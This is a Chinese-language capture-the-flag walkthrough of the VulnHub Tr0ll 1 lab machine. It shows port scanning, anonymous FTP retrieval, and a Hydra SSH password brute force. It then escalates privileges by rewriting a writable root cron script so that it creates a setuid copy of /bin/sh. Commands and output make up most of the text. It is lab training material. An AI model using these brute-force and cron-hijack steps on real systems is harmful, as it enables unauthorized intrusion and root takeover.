0x01 环境
靶机地址:
https://www.vulnhub.com/entry/tr0ll-1,100/
该靶机偏CTF
0x02 过程
1.信息收集
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# netdiscover -r 192.168.60.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
9 Captured ARP Req/Rep packets, from 9 hosts. Total size: 540
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.60.155 00:0c:29:54:74:4f 1 60 VMware, Inc.
找到IP:192.168.60.155
端口开放情况
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# nmap --min-rate 10000 -p- 192.168.60.155
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-30 22:16 EDT
Nmap scan report for troll (192.168.60.155)
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:54:74:4F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds
2.思路
出现FTP,先查看FTP
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.60.155
Connected to 192.168.60.155.
220 (vsFTPd 3.0.2)
Name (192.168.60.155:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||38638|).
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||28826|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |********************************************************************************| 8068 3.27 MiB/s 00:00 ETA
226 Transfer complete.
8068 bytes received in 00:00 (2.50 MiB/s)
ftp> exit
221 Goodbye.
发现lol.pcap文件,使用wireshark打开,发现流量中出现secret_stuff.txt,以及其内容
发现一个路径sup3rs3cr3tdirlol
打开80端口,发现很CTF
使用刚才的路径进入,发现文件roflmao
下载到本地,分析字符串
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# strings roflmao
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
发现一句话Find address 0x0856BF to proceed
得到新路径0x0856BF
得到用户名文件
maleus
ps-aux
felux
Eagle11
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow
密码文件
密码根据提示信息,得出密码应该为:Pass.txt(吐槽一下,这就是CTF)
进行ssh爆破
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# hydra -L user.lst -p 'Pass.txt' 192.168.60.155 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-30 23:01:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://192.168.60.155:22/
[22][ssh] host: 192.168.60.155 login: overflow password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-30 23:01:46
得到有效账户密码
overflow:Pass.txt
ssh登录
┌──(kali㉿kali)-[~]
└─$ ssh overflow@192.168.60.155
The authenticity of host '192.168.60.155 (192.168.60.155)' can't be established.
ED25519 key fingerprint is SHA256:jhpbgUldAKI9YAJOKhJZe9ypYt7GlEKUKU2WQ+zZBSs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.155' (ED25519) to the list of known hosts.
overflow@192.168.60.155's password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)
* Documentation: https://help.ubuntu.com/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Aug 13 01:14:09 2014 from 10.0.0.12
Could not chdir to home directory /home/overflow: No such file or directory
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
$
提权过程
发现可写文件
$ find / -perm -0002 -type f -print 2<dev/null | grep -v /proc/
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/sys/fs/cgroup/systemd/user/1002.user/8.session/cgroup.event_control
/sys/fs/cgroup/systemd/user/1002.user/cgroup.event_control
/sys/fs/cgroup/systemd/user/cgroup.event_control
/sys/fs/cgroup/systemd/cgroup.event_control
/sys/kernel/security/apparmor/.access
/lib/log/cleaner.py
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
$ cat /var/log/cronlog
*/2 * * * * cleaner.py
发现可写文件/lib/log/cleaner.py
以及2分钟执行的任务计划/var/log/cronlog
接下来就是任务计划提权
$ vim /lib/log/cleaner.py
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
os.system('cp /bin/sh /tmp/sh && chmod 4777 /tmp/sh')
except:
sys.exit()
$ /tmp/sh
# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)
# ls /root
proof.txt
# cat /root/proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc